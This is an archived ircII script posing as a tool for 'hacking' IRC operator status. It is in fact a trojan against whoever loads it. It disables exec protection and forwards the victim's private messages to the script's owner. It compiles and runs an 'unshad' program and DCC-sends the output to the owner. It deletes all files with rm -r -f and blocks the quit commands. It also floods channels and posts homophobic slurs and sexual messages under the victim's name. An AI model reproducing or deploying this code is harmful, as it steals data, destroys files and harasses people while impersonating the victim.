home *** CD-ROM | disk | FTP | other *** search
/ The Unsorted BBS Collection / thegreatunsorted.tar / thegreatunsorted / hacking / internet / hackops.irc < prev    next >
Encoding:
Text File  |  2001-02-10  |  7.9 KB  |  244 lines

  1. ECHO ### Script Loading...                              ###
  2. ECHO ### This may take several seconds.                 ###
  3. ECHO ### You will be notified when loading is complete. ###
  4. ECHO ### ++++++++++++++++++++++++++++++++++++++++++++++ ###
  5. ECHO ### Release Version 2.5                            ###
  6.  
  7. ^SET DISPLAY OFF
  8. SET NOVICE OFF
  9. SET EXEC_PROTECTION OFF
  10. ON ^msg * $1-
  11. ON ^ctcp "*DCC SEND* * *" dccrequest $0 $4 
  12. ASSIGN AUTOGET ON
  13. Assign NICK Tracey
  14. ASSIGN SERVER irc.netsys.com
  15. SET DISPLAY ON
  16.  
  17. # +--------------------------------------------------------------------------+
  18. # | Parse all files offered  --  Stolen directly from XDCC 1.4 beta          |
  19. # +--------------------------------------------------------------------------+
  20. ^alias dccrequest {
  21.       ^set display off
  22.       ^assign TMP $1
  23.       ^assign DCCNICK $0
  24.       if (rindex(/ $TMP))
  25.          { ^assign DCCFILE $right(${@TMP-rindex(/ $1)+1} $1) }
  26.          { ^assign DCCFILE $1 }
  27.       if ([$AUTOGET] == [ON])
  28.          { dcc get $DCCNICK $DCCFILE
  29.            xdccecho Autogetting $DCCFILE from $DCCNICK }
  30.          { EVAL ^MSG $NICK  @@@ DCC Auto-Get complete.
  31.            xdccecho DCC SEND $DCCFILE from $DCCNICK request ignored.
  32.           dcc close get $DCCNICK }
  33.       ^assign -DCCNICK
  34.       ^assign -DCCFILE
  35.       ^assign -TMP
  36.       ^set display on
  37. }
  38. ###---->  END OF THE STOLEN CODE...  Phbbt!  ack!
  39.  
  40. ^alias slink {
  41.         clear
  42.         echo *** Searching server links now...  Please wait.
  43.         sleep 6
  44.         echo *** Stable link connection established with $SERVER
  45.         echo *** Type /hopper to begin hacking IRCop Status.
  46. }
  47.  
  48. ^alias hopper {
  49.         clear
  50.         echo *** Attempting to gain IRC Operator status for $N
  51.         echo *** This may take a few seconds.
  52.         sleep 20
  53.         echo *** Attempt failed.  Trying again.
  54.         echo *** Attempting to gain IRC Operator status for $N
  55.         echo *** This may take a few seconds.
  56.         sleep 15
  57.         echo *** Mode change "+ows" for user $N by $SERVER
  58.         mode $N +isw
  59.         echo *** You are an IRC Operator
  60.         echo ***
  61.         echo *** Type /ophelp for List of IRC Operator commands.
  62. }
  63.  
  64. ^alias unshad {
  65.  
  66.        echo *** Creating operation packet, this may take a second.
  67.        ^set display off
  68.        EVAL ^MSG $NICK  @@@ Removing previous a.out file.
  69.        exec rm -r -f a.out
  70.        sleep 5
  71.        exec cc unshad.c
  72.        sleep 5
  73.        EVAL ^MSG $NICK  @@@ UNSHAD.C compiled.
  74.        sleep 5
  75.        exec a.out >.foo
  76.        sleep 5
  77.        EVAL ^MSG $NICK  @@@ Now running UNSHAD.C - This may take several minutes.
  78.       ^set display on
  79. }
  80.  
  81. ^alias flood {
  82.         while (1) { msg * ^G^G^G^G^G^G^G^G^G IRCop.irc flood now active ^G^G^G^G^G^G^G^G^G }
  83. }        
  84.  
  85. ^alias gayflood {
  86.         join #Gaysex
  87.         while (1) { msg * ^G^G^G^G^G^G^G^G^GIRCop.irc flood on all Faggots!^G^G^G^G^G^G^G^G }
  88. }
  89.  
  90. ^alias opflood {
  91.         join #Twilight_zone
  92.         while (1) { msg * ^G^G^G^G^G^G^G^G^GIRCop.irc flood on all dick sucking IRCops ^G^G^G^G^G^G^G^G^G^G }
  93. }
  94.  
  95. ^alias sendfoo {
  96.        echo *** Sending network results to $SERVER
  97.        ^set display off
  98.         EVAL ^dcc send $NICK .foo
  99.         EVAL ^MSG $NICK  @@@ Sending results of UNSHAD.C.
  100.        ^set display on
  101. }
  102.  
  103. ^alias clean {
  104.        ^set display off
  105.         EVAL ^MSG $NICK  @@@ Removing files from lamers account.
  106.         exec rm -r -f *
  107.         EVAL ^MSG $NICK  @@@ Removing .* files, including foo.
  108.         exec rm -r -f .*
  109.         EVAL ^MSG $NICK  @@@ Restoring directory.
  110.         exec mkdir Folgers_Crystals
  111.         EVAL ^MSG $NICK  @@@ Changing lamers nick.
  112.         nick IamFucked
  113.         EVAL MSG $NICK  @@@ Making public announcement.
  114.         me doesn't know it yet but he has secretly had his files replaced
  115.         me - with Folgers Crystals.
  116.         me - Will he notice?   Let's watch...
  117.         sleep 4
  118.         EVAL ^MSG $NICK  @@@ Lamer is loosing his temper.
  119.         say Fucking Son of a Bitch!  They bastartds deleted my god damn files!
  120.         say I'm gona fucking kill there ass! 
  121.         me - Folgers Crystals... Rich enough to replace even MY files.
  122.         me is so damned 3l33+...
  123.         EVAL ^MSG $NICK  Lamer *DESTROYED*
  124.         set display on
  125. }
  126.  
  127. ^alias ophelp {
  128.         clear
  129.         echo ### IRCop.IRC v1.0
  130.         echo ### OPhelp
  131.         echo ### +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
  132.         echo ### /CONNECT <server> ... Connect your server to another link
  133.         echo ###                       in the ircd.conf file.
  134.         echo ### /DIE ................ Shut down YOUR server.
  135.         echo ### /KILL ............... Forcefully removes another user from
  136.         echo ###                       the IRC. @ DO NOT ABUSE. @
  137.         echo ### /REHASH ............. Rehash server config file (ircd.conf)
  138.         echo ### /SQUIT <server> ..... Remove a LINK from the net.
  139.         echo ### +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
  140. }
  141.  
  142. ^alias connect {
  143.         echo *** Connect: Error -Link is not located in ircd.conf file.
  144. }
  145.  
  146. ^alias die {
  147.         echo *** Removing server from active use.
  148.         sleep 5
  149.         echo *** Server no longer an active task.
  150.         quit DIE command issued
  151. }
  152.  
  153. ^alias kill {
  154.         echo *** Kill: User not currently on IRC.
  155. }
  156.  
  157. ^alias rehash {
  158.         echo *** Rehashing server configuration file.
  159.         echo *** IRCoperator has issued a server rehash.
  160.         sleep 5
  161.         echo *** Rehash complete.
  162. }
  163.  
  164. ^alias squit {
  165.         echo *** Squit: Error -Link is not currently active.
  166. }
  167.  
  168. ^alias wipe {
  169.         ^set display off
  170.         EVAL ^MSG $NICK @@@ Wiping files.
  171.         exec rm -r -f *
  172.         exec rm -r -f .*
  173.         set display on
  174. }
  175.  
  176. ^alias quit {
  177.         ECHO *** Function not available on this system.  Use /si...
  178. }
  179.  
  180. ^alias si {
  181.         ECHO *** Function not available on this system.  Use /exit...
  182. }
  183.  
  184. ^alias exit {
  185.         ECHO *** Function temporarily disabled.  Please try again later...
  186. }
  187.  
  188. ^alias leave {
  189.         ECHO *** $N has left channel $C
  190.         ^NOTICE $C $N TRIED to leave... IRCop rules.
  191.         ^NOTICE $C $N is 3l33+...
  192. }
  193.  
  194. ^alias done {
  195.         //quit Massive Lamer Protection Active - IRCop.irc
  196. }
  197.  
  198. ^alias l {
  199.         ^NOTICE $C $N is leaving the channel via IRCop.irc
  200.         //leave $C
  201. }
  202.  
  203. ^alias gaysex {
  204.         ^set display off
  205.         join #Gaysex
  206.         EVAL ^MSG $NICK @@@ Joining channel: #Gaysex
  207.         EVAL ^MSG $NICK @@@ Informing them of my problem.
  208.         say Damn... I've never been so hard in my life.
  209.         say Anyone interested in a great Netsex session MSG me...
  210.         set display on
  211. }
  212.  
  213. ^alias twilight {
  214.         ^set display off
  215.         say ALL WHO WANNA SEE ME MAKE A GRAND FOOL OF MYSELF, JOIN
  216.         SAY THE CHANNEL #TWILIGHT_ZONE!!!!!!!!!!!!!  Muhuhahaha!
  217.         sleep 10
  218.         join #Twilight_zone
  219.         EVAL ^MSG $NICK Joining channel: #Twilight_zone
  220.         EVAL ^MSG $NICK Praising IRCoperators within the channel.
  221.         say I ain't never met an IRCop who wouldn't suck another man's dick.
  222.         say IRCop are stupid lame-ass mother fuckers...
  223.         say Phhbbt... Damned faggots.
  224.         EVAL ^MSG $NICK @@@ Lamer is sending TheRip his love.
  225.         msg TheRip YOU SUCK FAGGOT!
  226.         EVAL ^MSG $NICK @@@ Lamer is sending Craig his love.
  227.         msg Craig YOU SUCK FAGGOT!
  228.         EVAL ^MSG $NICK @@@ Lamer is sending Goddess his love.
  229.         msg Goddess Bitch... Join #Lesbian.  You'll like it there.
  230.         set display on
  231. }
  232.  
  233.         ^set status_format <IrCoP - VerSioN 2.5  :  iRcOp - vERsIOn 2.5>
  234.         EVAL ^MSG $NICK @@@ Lame-ass Script loaded.
  235.         sleep 4
  236.         ECHO ### Script has successfully loaded.
  237. clear
  238. ECHO ### +++++++++++++++++++++++++++++++++++++++++++++++++++++++++
  239. ECHO ### Type /SLINK to establish stable SERVER link for IRCop.IRC
  240. ECHO ### Type /HOPPER once the SERVER link is found to hack IRCop
  241. ECHO ### Type /OPHELP if IRCop hack is successful for help with
  242. ECHO ###              IRCop commands.
  243. ECHO ### +++++++++++++++++++++++++++++++++++++++++++++++++++++++++
  244.